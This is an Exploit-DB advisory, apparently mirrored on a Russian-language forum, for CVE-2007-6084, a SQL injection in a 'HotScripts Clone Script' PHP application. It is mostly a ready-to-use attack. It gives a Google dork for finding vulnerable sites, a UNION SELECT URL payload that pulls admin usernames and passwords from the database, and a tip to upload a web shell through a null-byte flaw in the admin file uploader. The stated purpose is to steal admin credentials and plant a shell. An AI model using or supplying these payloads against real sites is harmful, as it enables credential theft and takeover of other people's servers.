- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4633
- Проверка EDB
-
- Пройдено
- Автор
- T0PP8UZZ
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-6084
- Дата публикации
- 2007-11-18
Код:
--==+================================================================================+==--
--==+ HotScripts Clone Script SQL Injection Vulnerbility +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK (google): "Software Categories" "Featured Resources" "Search"
DESCRIPTION:
Pull admin info from database, and maybe upload shell.
EXPLOITS:
www.site.com/software-description.php?id=-1/**/UNION/**/ALL/**/SELECT/**/concat(admin_name,char(58),pwd)/**/FROM/**/sbwmd_admin/*
NOTE/TIP:
admin login is at /siteadmin/
image upload /siteadmin/fileupload.php, its vulnerable to PHP Nullbyte posisoning. so upload shell.
i know this doesnt look like a HotScripts clone but it is.
GREETZ: milw0rm.com, H4CK-Y0u.org
--==+================================================================================+==--
--==+ HotScripts Clone Script SQL Injection Vulnerbility +==--
--==+================================================================================+==--
# milw0rm.com [2007-11-18]
- Источник
- www.exploit-db.com